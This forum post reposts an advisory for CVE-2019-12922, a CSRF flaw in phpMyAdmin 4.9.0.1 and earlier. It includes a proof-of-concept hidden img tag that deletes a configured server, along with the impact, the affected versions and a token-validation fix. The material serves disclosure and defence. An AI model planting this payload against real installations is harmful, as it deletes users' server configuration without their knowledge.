Jump to content
Sign in to follow this  
Koray

phpmyadmin vulnerability(CVE-2019-12922)

Recommended Posts

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.

PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />

BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.

SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.


Source: https://www.exploit-db.com/exploits/47385

  • Love 1

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.